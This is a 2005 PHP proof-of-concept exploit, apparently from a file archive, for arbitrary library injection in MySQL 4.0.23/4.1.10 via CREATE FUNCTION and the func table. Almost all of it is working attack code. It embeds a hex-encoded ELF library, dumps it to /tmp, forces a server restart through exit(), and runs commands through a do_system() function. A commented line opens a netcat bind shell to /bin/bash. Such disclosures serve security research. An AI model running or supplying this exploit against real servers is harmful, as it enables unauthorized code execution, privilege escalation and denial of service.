home *** CD-ROM | disk | FTP | other *** search
- <?
- /*************************************
- ** Mysql CREATE FUNCTION func table arbitrary library injection
- **
- ** Author: Stefano Di Paola
- ** Vulnerable: Mysql <= 4.0.23, 4.1.10
- ** Type of Vulnerability: Local/Remote Privileges Escalation - input validation
- ** Tested On : Mandrake 10.1 /Debian Sarge
- ** Vendor Status: Notified on March 2005
- **
- ** Copyright 2005 Stefano Di Paola (stefano.dipaola@wisec.it)
- **
- **
- ** Disclaimer:
- ** In no event shall the author be liable for any damages
- ** whatsoever arising out of or in connection with the use
- ** or spread of this information.
- ** Any use of this information is at the user's own risk.
- **
- **
- *************************************
- */
-
-
- // this is the MySql root password.
- $pass='useyoupasswordhere';
-
- function mysql_create_db($db,$link)
- {
- $query="CREATE database $db;";
- return mysql_query($query, $link) ;
-
- }
- // the library in little endian hex. (from NGS's Hackproofing_MySql
- // http://www.nextgenss.com/papers/HackproofingMySQL.pdf )
- $solib="0x7f454c4601010100000000000000000003000300010000002006000034000000340a00000000 \
- 00003400200004002800160015000100000000000000000000000000000094070000940700000500000000 \
- 1000000100000094070000941700009417000004010000080100000600000000100000020000009c070000 \
- 9c1700009c170000c8000000c8000000060000000400000051e57464000000000000000000000000000000 \
- 00000000000600000004000000250000002800000000000000260000000000000000000000000000000000 \
- 00000000000022000000270000000000000000000000000000000000000000000000000000000000000000 \
- 00000000000000230000001e00000000000000000000000000000000000000000000002000000000000000 \
- 00000000000000000000000021000000250000000000000000000000000000002400000000000000000000 \
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
- 000000001c000000000000001f000000000000001d00000000000000000000000000000000000000000000 \
- 0000000000b4000000000000000300010000000000f0010000000000000300020000000000700400000000 \
- 00000300030000000000100500000000000003000400000000006005000000000000030005000000000090 \
- 050000000000000300060000000000c0050000000000000300070000000000d00500000000000003000800 \
- 00000000e8050000000000000300090000000000200600000000000003000a000000000074070000000000 \
- 0003000b0000000000900700000000000003000c0000000000941700000000000003000d00000000009c17 \
- 00000000000003000e0000000000641800000000000003000f00000000006c180000000000000300100000 \
- 00000074180000000000000300110000000000781800000000000003001200000000009818000000000000 \
- 03001300000000000000000000000000030014000000000000000000000000000300150000000000000000 \
- 00000000000300160000000000000000000000000003001700000000000000000000000000030018000000 \
- 000000000000000000000300190000000000000000000000000003001a0000000000000000000000000003 \
- 001b00010000009c170000000000001100f1ff610000000000000076000000120000002f000000d0050000 \
- 00000000120008007900000098180000000000001000f1ff35000000740700000000000012000b003b0000 \
- 000000000097000000220000005e000000080700003600000012000a007200000098180000000000001000 \
- f1ff0a00000078180000000000001100f1ff850000009c180000000000001000f1ff4a0000000000000000 \
- 0000002000000020000000000000000000000020000000005f44594e414d4943005f474c4f42414c5f4f46 \
- 465345545f5441424c455f005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f5f6378 \
- 615f66696e616c697a65005f4a765f5265676973746572436c617373657300646f5f73797374656d006c69 \
- 62632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e33 \
- 00474c4942435f322e30000000000000000000000000000000000000000000000000000000000000000000 \
- 00000000000000000000000000000000000000000000000001000200010001000100030001000100010001 \
- 000000000001000200680000001000000000000000731f6909000003008a000000100000001069690d0000 \
- 02009600000000000000941700000800000098170000080000002b070000021d00008c1800000621000090 \
- 180000062600009418000006270000841800000721000088180000072600005589e583ec08e845000000e8 \
- e0000000e85b010000c9c300ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffff \
- ffffa3100000006808000000e9d0ffffff00000000000000005589e553e8000000005b81c34f120000528b \
- 831c00000085c07402ffd0585bc9c39090909090909090909090909090905589e553e8000000005b81c31f \
- 1200005180bb200000000075348b931400000085d2752f8b8320ffffff8b1085d2741783c004898320ffff \
- ffffd28b8320ffffff8b1085d275e9c68320000000018b5dfcc9c383ec0c8b831cffffff50e846ffffff83 \
- c410ebbd89f68dbc27000000005589e553e8000000005b81c3af110000508b83fcffffff85c0740a8b8318 \
- 00000085c0750b8b5dfcc9c38db60000000083ec0c8d83fcffffff50e809ffffff83c4108b5dfcc9c39055 \
- 89e583ec088b450c8338017409c745fc00000000eb1a83ec0c8b450c8b4008ff30e8fcffffff83c410c745 \
- fc000000008b45fcc9c390905589e55653e8000000005b81c32e1100008d83f0ffffff8d70fc8b40fc83f8 \
- ff740c83ee04ffd08b0683f8ff75f45b5e5dc390905589e553e8000000005b81c3fb10000050e8c6feffff \
- 595bc9c3000000000000941700007018000001000000680000000c000000d00500000d0000007407000004 \
- 000000b4000000050000007004000006000000f00100000a000000a00000000b0000001000000003000000 \
- 781800000200000010000000140000001100000017000000c0050000110000009005000012000000300000 \
- 0013000000080000001600000000000000feffff6f60050000ffffff6f01000000f0ffff6f10050000faff \
- ff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000 \
- 000000ffffffff00000000ffffffff00000000000000009c1700000000000000000000fe0500000e060000 \
- 000000000000000000000000004743433a2028474e552920332e332e3120284d616e6472616b65204c696e \
- 757820392e3220332e332e312d316d646b2900004743433a2028474e552920332e332e3120284d616e6472 \
- 616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e552920332e332e31 \
- 20284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e55 \
- 2920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743 \
- 433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d316d \
- 646b2900002e7368737472746162002e68617368002e64796e73796d002e64796e737472002e676e752e76 \
- 657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e \
- 6974002e74657874002e66696e69002e65685f6672616d65002e64617461002e64796e616d6963002e6374 \
- 6f7273002e64746f7273002e6a6372002e676f74002e627373002e636f6d6d656e74000000000000000000 \
- 000000000000000000000000000000000000000000000000000000000000000000000b0000000500000002 \
- 000000b4000000b40000003c01000002000000000000000400000004000000110000000b00000002000000 \
- f0010000f001000080020000030000001c0000000400000010000000190000000300000002000000700400 \
- 0070040000a00000000000000000000000010000000000000021000000ffffff6f02000000100500001005 \
- 000050000000020000000000000002000000020000002e000000feffff6f02000000600500006005000030 \
- 000000030000000100000004000000000000003d0000000900000002000000900500009005000030000000 \
- 02000000000000000400000008000000460000000900000002000000c0050000c005000010000000020000 \
- 000900000004000000080000004f0000000100000006000000d0050000d005000017000000000000000000 \
- 000004000000000000004a0000000100000006000000e8050000e805000030000000000000000000000004 \
- 00000004000000550000000100000006000000200600002006000054010000000000000000000010000000 \
- 000000005b000000010000000600000074070000740700001a000000000000000000000004000000000000 \
- 00610000000100000002000000900700009007000004000000000000000000000004000000000000006b00 \
- 00000100000003000000941700009407000008000000000000000000000004000000000000007100000006 \
- 000000030000009c1700009c070000c8000000030000000000000004000000080000007a00000001000000 \
- 03000000641800006408000008000000000000000000000004000000000000008100000001000000030000 \
- 006c1800006c08000008000000000000000000000004000000000000008800000001000000030000007418 \
- 00007408000004000000000000000000000004000000000000008d00000001000000030000007818000078 \
- 08000020000000000000000000000004000000040000009200000008000000030000009818000098080000 \
- 04000000000000000000000004000000000000009700000001000000000000000000000098080000fa0000 \
- 00000000000000000001000000000000000100000003000000000000000000000092090000a00000000000 \
- 0000000000000100000000000000";
-
- $link=mysql_connect("127.0.0.1","root",$pass);
- if (!$link) {
- die('Could not connect: ' . mysql_error());
- }
- echo "Connected successfully as root\n";
- echo "creating db for lib\n";
- mysql_create_db('my_db',$link) or print ('cannot create my_db db, sorry!');
- echo "done....\n";
- echo "selecting db for lib\n";
- mysql_select_db('my_db') or print ('cannot use my_db db, sorry!');
- echo "done....\n";
-
- echo "creating blob table for lib\n";
- $query="CREATE TABLE blob_tab (blob_col BLOB);";
- $result = mysql_query($query, $link) or print("cannot create blob table for lib\n");
- echo "done....\n";
-
- echo "inserting blob table for lib\n";
- $query="INSERT into blob_tab values (CONVERT($solib,CHAR));";
- $result = mysql_query($query, $link) or print("cannot insert blob for lib\n");
- echo "done....\n";
-
- echo "dumping lib in /tmp/libso.so.0...\n";
- $query="SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso.so.0';";
- $result = mysql_query($query, $link) or print("cannot dump lib\n");
- echo " done....\n";
-
- mysql_select_db('mysql') or die ('cannot use mysql db, sorry!');
- echo "sending lib....\n";
-
- $query="insert into func (name,dl) values ('do_system','/tmp/libso.so.0');";
- $result = mysql_query($query, $link);
- echo "done....\n";
- echo "Creating exit function to restart server\n";
-
- $query="create function exit returns integer soname 'libc.so.6';";
- $result = mysql_query($query, $link) or print ("cannot create exit, sorry!\n");
- echo "done....\n";
- echo "Selecting exit function\n";
-
- $query="select exit();";
- $result = mysql_query($query, $link);
- echo "done!\nWaiting for server to restart\n";
-
- sleep(1);
-
- $link=mysql_connect("127.0.0.1","root",$pass);
- if (!$link) {
- die('Could not connect: ' . mysql_error());
- }
- echo "Connected to MySql server again...\n";
-
- //$cmd ='/usr/sbin/nc -l -p 8000 -e /bin/bash';
- $cmd ='id >/tmp/id';
- echo "Sending Command...$cmd\n";
- $query="select do_system('$cmd');";
- $result = mysql_query($query, $link);
- echo "done!\n";
- echo "Now use your fav shell and ls /tmp/id -l \n";
- mysql_close($link);
-
- ?>
-
-
-